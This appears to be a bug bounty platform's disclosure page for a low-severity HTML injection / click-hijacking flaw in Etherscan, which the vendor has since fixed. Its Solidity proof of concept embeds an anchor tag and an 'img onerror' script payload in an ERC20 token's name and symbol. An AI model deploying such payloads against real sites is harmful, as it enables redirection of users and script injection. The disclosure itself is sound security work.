分享到

Vulnerability details

Audit statusClaim status

Audit Passed
2018-09-19 17:12:16
Has been claimed
2018-09-20 11:19:09

Vulnerability status:Has been claimed

Congratulations! The vulnerability you submitted has been claimed by the vendor

The manufacturer confirms the vulnerability information as following:

Level: Low

Reward: 0.5 Ether

Vulnerability Information

Serial Number :
DVP-2018-11357
Title :
Click Hijacking
Target Type :
Web flaw
Attack Type :
Injection class vulnerability
Level :
Low
Reward :
0.5 Ether
Company :
Etherscan
Nickname :
LoRexxar233
Vulnerability Description :

漏洞URL:如果是Web就填写此项

 https://etherscan.io

简要描述:漏洞说明、利用条件、危害等

 部署合约代币时,符合ERC20标准的情况下,symbol和name自定义,可嵌入a标签覆盖原本的标签。


在用户访问点击页面内的合约名字,可以劫持至任意网站。


需要部署ERC20标准的合约,且在访问合约页面之前,发起一次交易。

漏洞证明:

 https://ropsten.etherscan.io/address/0x701300f2f2c171c8c7c09e0fa09d6706a4fc7cd6#tokentxns

漏洞利用代码:

 

pragma solidity ^0.4.24;

contract MyTest {

    mapping(address => uint256) balances;

    uint256 public totalSupply;

    mapping (address => mapping (address => uint256)) allowance;

    address public owner;

    string public name;

    string public symbol;

    uint8 public decimals = 18;

    event Transfer(address indexed _from, address indexed _to, uint256 _value);

    function MyTest() {

        name = "<a href=http://baidu.com>12321</a>";

        symbol = 'ok<img src=/ onerror=alert(1)> ';

        totalSupply = 100000000000000000000000000000000000;

    }

    function mylog(address arg0, address arg1, uint256 arg2) public {

        Transfer(arg0, arg1, arg2);

    }

}

修复方案:


过滤

————————————————————————————————

经与Etherscan厂商联系,目前已修复该漏洞

Audit Success

Your application has been submitted and waiting for deal with.

Sure